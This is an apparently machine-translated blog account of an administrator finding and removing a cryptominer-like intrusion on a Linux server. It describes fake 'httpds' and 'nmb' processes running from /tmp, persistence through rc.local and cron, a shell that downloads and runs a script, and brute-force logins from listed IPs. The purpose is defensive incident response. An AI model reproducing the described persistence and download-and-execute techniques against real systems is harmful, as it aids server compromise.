Today login Zabbix Monitoring Web page when found very card, log in to the system after, through top, CPU has 100%, there is a process called Httpds occupy, the first reflection is the system was invaded, the following records the process, only for your reference
Using top to find that CPU consumption is up to 100%, is HTTPDS process occupation, the normal Apache process should be httpd, feel the process is abnormal,
Through Ps-ef|grep Httpds view, executable file under TMP, this certainly is not normal, decided to delete Httpds this file and process again look
After deletion, the CPU process is still very high, indicating that other processes are running in the background
Through PS view this process, found also in the TMP directory, but the TMP directory does not have this file, it is rather strange.
Temporarily do not consider the problem of this file, first to check the scheduled task, there must be a scheduled task responsible for initiating these programs.
View Crontab-e found no scheduled tasks
View
This one has a Zabbix, open discovery.
This is not the Zabbix mission, decisively delete this file
After deleting these files, kill the processes using kill and discover that the CPU is occupied.
After the scheduled task is viewed, check the boot entry again.
Vim/etc/rc.local
How can boot start a program named X, this is definitely a problem, go to TMP and see what this x is.
Find the culprit, is the program started the HTTPDS service, then this program is how to come? Not surprisingly, decided to go to the system to see if there are abnormal processes
View system-active processes with top
How can there be a sh process? I did not execute the script, through PS to see what this sh is doing
This sh process is downloading a script named X from a Web site and giving 777 permissions and then executing, and here we see why there is a script for x, which is the download, then who initiated the command?
Since the X program directory under TMP, then we go to the TMP directory to find
There are so many programs, turn it on and see
There's this in the CMD.N program.
Looking at is the start file of SH's command, it is estimated that this thing was first triggered.
Then use the PS-EF to check all the processes, see if there are any other abnormal processes, found that there is a more strange,
Under normal circumstances, Samba's process should be nmbd, how does this have a NMB program? Check the process.
Really is not a normal program, but also under the TMP of an executable file, open is a binary thing, do not know what, regardless of, first delete, then delete and then kill the process
During the insurance period, remove all files under TMP. No other abnormal programs have been found, so this processing is done
The server must have a vulnerability that could cause the system to be compromised, check the system log
/var/log/secure
Found a lot of unusual logins
163.172.190.5 UK address, try logging in with a variety of user names
91.197.232.103 Russian address, try logging in with a variety of user names
51.15.134.37 France address, try to log in with various user names
193.70.122.217 Italy address, try to log in with various user names
221.194.47.249 Hebei Baoding Address, try to log in with various user names
But the log before the time of the problem has been deleted, there is no way to find out how the system was invaded. The follow-up should be slowly checked.
Summarize this process, from the server is the intrusion process summarized as follows processing process
1, use whitch check the system command has been changed: which Ls;witch cd;whitch PS and so on, to prevent the use of the command is modified.
2, check the exception process: Through the top view there is no high CPU consumption, through PS-EF see there is no name strange process.
3, check the Scheduled Tasks/var/spool/cron directory, and Crontab-e there are no exception scheduled tasks
4. Check boot entry: vim/etc/rc.local See if there is an abnormal boot start
"Linux" records the process of a system attack